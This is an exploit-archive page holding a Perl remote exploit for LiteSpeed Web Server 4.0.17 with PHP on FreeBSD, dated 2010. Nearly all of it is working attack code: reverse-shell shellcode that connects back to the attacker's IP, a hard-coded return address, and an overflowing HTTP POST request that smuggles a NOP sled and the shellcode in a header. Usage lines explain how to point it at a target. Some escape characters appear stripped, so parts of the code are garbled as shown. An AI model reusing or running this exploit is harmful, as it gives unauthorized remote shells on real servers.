LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# Published : 2010-12-10
# Author : Kingcope
# Previous Title : Exim 4.63 Remote Root Exploit
# Next Title : VMware Tools update OS Command Injection
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on default lsphp binary not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn't a null put at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
        # setreuid, no root here
        "x31xc0x31xc0x50x31xc0x50xb0x7ex50xcdx80".
        # connect back :>
        "x31xc0x31xdbx53xb3x06x53".
        "xb3x01x53xb3x02x53x54xb0".
        "x61xcdx80x31xd2x52x52x68".
        "x41x41x41x41x66x68x01xbb".
        "xb7x02x66x53x89xe1xb2x10".
        "x52x51x50x52x89xc2x31xc0".
        "xb0x62xcdx80x31xdbx39xc3".
        "x74x06x31xc0xb0x01xcdx80".
        "x31xc0x50x52x50xb0x5axcd".
        "x80x31xc0x31xdbx43x53x52".
        "x50xb0x5axcdx80x31xc0x43".
        "x53x52x50xb0x5axcdx80x31".
        "xc0x50x68x2fx2fx73x68x68".
        "x2fx62x69x6ex89xe3x50x54".
        "x53x50xb0x3bxcdx80x31xc0".
        "xb0x01xcdx80";

sub usage() {
        print "written by kingcopen";
        print "usage:n".
                  "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>nn".
                  "example:n".
                  "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.phpnn";

        exit;
}

if ($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));

substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                         Proto    => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1rnHost: 192.168.2.5rnrn";

#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                  PeerPort => $port,
                                          Proto    => 'tcp');


$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "x90" x 3000 . $bsdcbsc;

print $sock "POST /x90x90x90x90x90x90xebx50/../$file?
HTTP/1.1rnHost: $targetrnVVVV: $scrn$a KINGCOPEH4XXU:rnrn";

while (<$sock>) {
	print;
}